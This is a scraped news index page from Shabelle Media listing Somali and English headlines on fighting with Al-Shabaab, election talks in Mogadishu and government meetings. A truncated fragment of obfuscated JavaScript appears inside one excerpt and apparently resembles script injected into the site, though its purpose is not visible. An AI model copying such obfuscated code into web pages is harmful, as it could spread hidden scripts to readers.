Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Dhageyso: Warka subax ee Idaacadda Shabelle

Halkan hoose ka dhageyso warka subax Idaacadda Shabelle ee magaalada Muqdisho. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return...

Dagaal khasaare geystay oo ka dhacay gobolka Shabeelaha Dhexe

Wararka laga helayo gobolka Shabeelaha Dhexe ayaa sheegaya in saacadihii lasoo dhaafay dagaal u dhexeeyey ciidamada dowladda iyo Al-Shabaab uu ka dhacay...

Duqa Muqdisho oo kulan la qaatay waxgaradka 5 degmo + Sawirro

Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Cumar Maxamuud Maxamed (Cumar Filish) ayaa Barnaamijka la tashiga dadweynaha oo uu maskaxdiisa lahaa...

Somali Govt says election talks failed

The government of Somalia announced Wednesday that the latest round of the talks between president Farmajo and leaders of the Federal States...

Shirkii ka socday Afisyooni oo natiijo la’aan kusoo dhammaaday + sababta

Shirkii u dhexeeyay dowladda federaalka ah ee Soomaaliya, dowlad goboleedyada iyo gobolka Banaadir ayaa mar kale la'isku mari waayey, gaar ahaan qodobadii...

Somalia: Erdogan Hospital gives food aid to the orphanage

The administration of the Recep Tayyip Erdogan Training and Research Hospital in Mogadishu on Tuesday delivered food aid to Imamu-Nawawi Orphanage Center...

Shirkii Golaha Wadatashiga Arrimaha Doorashooyinka oo ka furmay Afisyooni

Shirkii Golaha Wadatashiga Arrimaha Doorashooyinka ayaa goor dhow ka furmay Teendhada Afisyooni ee magaalada Muqdisho, kaas oo looga arrinsanayo xaaladda siyaasadeed ee...

DF Soomaaliya oo rajo wanaagsan ka muujisay shirka ka socda Afisyooni

Dowladda Soomaaliya ayaa sheegtay in ay go’an tahay, kuna dadaalayso sidii uu u mira dhali lahaa kulamada wadatashiga ah ee  u socda...

Beesha caalamka oo war cusub kasoo saartay doorashooyinka 2021-ka

Iyadoo ay Soomaalidu u diyaar garoobayaan soo dhaweynta Bisha Barakeysan ee Ramadaan, Beesha Caalamigu waxay muujinayaan rajo ah in mabaadi’da aasaasiga ah...

Dhageyso: Warka subax ee Idaacadda Shabelle

Halkan hoose ka dhageyso warka subax Idaacadda Shabelle ee magaalada Muqdisho.

WARAR KALE

Wasiirka Gaashaandhigga Soomaaliya oo qaabilay Safiirka Shiinaha

Muqdisho – Wasiirka Gaashaandhigga Xukuumadda Federaalka Soomaaliya, Mudane Axmed Macallin Fiqi, ayaa maanta xafiiskiisa ku qaabilay Safiirka Jamhuuriyadda Shacabka Shiinaha u fadhiya Soomaaliya, Danjire...

Saraakiil iyo saraakiil-xigeenno oo tababar ku saabsan ilaalinta dadka rayidka ah loogu furay Muqdisho

Muqdisho – Madaxa Hoggaanka Isku-xirka Shacabka iyo Ciidanka Xoogga Dalka Soomaaliyeed (CIMIC), Gaashaanle Sare Iimaan Maxamuud Cali, ayaa maanta Dugsiga Tababarka Janaraal Dhagabadan ka...

Madaxweyne Xasan Sheekh oo xarigga ka jaray xarumaha cusub ee Golaha Wakiillada iyo Wasaaradda...

Jowhar  – Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud ayaa xarigga ka jaray dhismeyaasha cusub ee xarunta Golaha Wakiillada iyo Wasaaradda Amniga Dowlad...